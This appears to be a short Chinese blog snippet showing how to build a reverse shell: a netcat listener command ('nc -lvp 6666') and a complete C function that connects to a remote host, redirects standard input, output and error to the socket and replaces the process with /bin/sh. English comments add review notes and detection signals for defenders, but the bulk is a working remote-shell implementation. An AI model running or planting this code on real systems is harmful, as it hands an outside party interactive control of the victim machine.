文章链接:https://codemouse.online/archives/2020-04-02182636
服务器开启监听
nc -lvp 6666
客户端连接服务器,并把本机 shell 的输入输出交给服务端(即反向 shell)
/*
 * Connects to bd_ip:bd_port over a TCP/IPv4 socket, points file descriptors
 * 0, 1 and 2 at that socket, and then replaces the calling process with
 * /bin/sh. The peer that accepted the connection ends up reading and writing
 * the shell's stdin/stdout/stderr.
 *
 * bd_ip   - host name or address string handed to gethostbyname().
 * bd_port - TCP port in host byte order (converted with htons() below).
 *
 * Returns nothing. Every failure path is a silent return, so the caller
 * cannot tell whether the connection was made. On success the function does
 * not return at all, because execl() replaces the process image.
 *
 * Notes for reviewers and defenders, all visible in the code below:
 *  - There is no fork(): the calling process itself becomes the shell, so it
 *    keeps the caller's PID and parent.
 *  - The resulting /bin/sh has fds 0, 1 and 2 all referring to one TCP
 *    socket, and it is exec'd right after an outbound connect(). Both are
 *    useful signals for process and socket monitoring.
 *  - The socket is used as-is, with no encryption or authentication layer,
 *    so the session content is visible to network inspection.
 */
void start_reverse_shell(char *bd_ip, unsigned short int bd_port)
{
int sd;
struct sockaddr_in serv_addr;
struct hostent *server;
// Stream socket in the IPv4 family.
sd = socket(AF_INET, SOCK_STREAM, 0);
if (sd < 0)
return;
server = gethostbyname(bd_ip);
// NOTE(review): sd is still open on this return path (descriptor leak).
if (server == NULL)
return;
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
// NOTE(review): h_length bytes are copied into s_addr without comparing
// h_length to sizeof(serv_addr.sin_addr.s_addr) or checking h_addrtype.
bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);
// Port goes on the wire in network byte order.
serv_addr.sin_port = htons(bd_port);
// NOTE(review): sd is also left open when connect() fails.
if (connect(sd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0)
return;
// Redirect stdin, stdout and stderr to the socket connected to the server.
// The dup2() return values are not checked.
dup2(sd, 0);
dup2(sd, 1);
dup2(sd, 2);
// Run the shell. The first argument after the path is NULL, so the shell is
// started with an empty argument vector (no argv[0]); that is unusual for a
// normally launched shell and is another anomaly process monitoring can use.
execl("/bin/sh", NULL, NULL);
// Only reached if execl() failed; on success the process image was replaced.
close(sd);
}